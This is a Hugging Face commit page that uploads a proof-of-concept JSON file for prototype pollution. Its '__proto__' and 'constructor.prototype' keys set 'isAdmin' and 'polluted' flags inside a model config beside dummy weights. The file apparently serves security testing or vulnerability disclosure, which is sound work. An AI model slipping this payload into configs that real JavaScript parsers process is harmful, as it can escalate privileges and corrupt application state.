WolfpackArmy commited on
Commit
0c83835
·
verified ·
1 Parent(s): b50ff38

Upload poc_prototype_pollution.json with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_prototype_pollution.json +18 -0
poc_prototype_pollution.json ADDED
@@ -0,0 +1,18 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "model_config": {
3
+ "__proto__": {
4
+ "isAdmin": true,
5
+ "polluted": "yes"
6
+ },
7
+ "constructor": {
8
+ "prototype": {
9
+ "polluted": true
10
+ }
11
+ }
12
+ },
13
+ "weights": [
14
+ 1.0,
15
+ 2.0,
16
+ 3.0
17
+ ]
18
+ }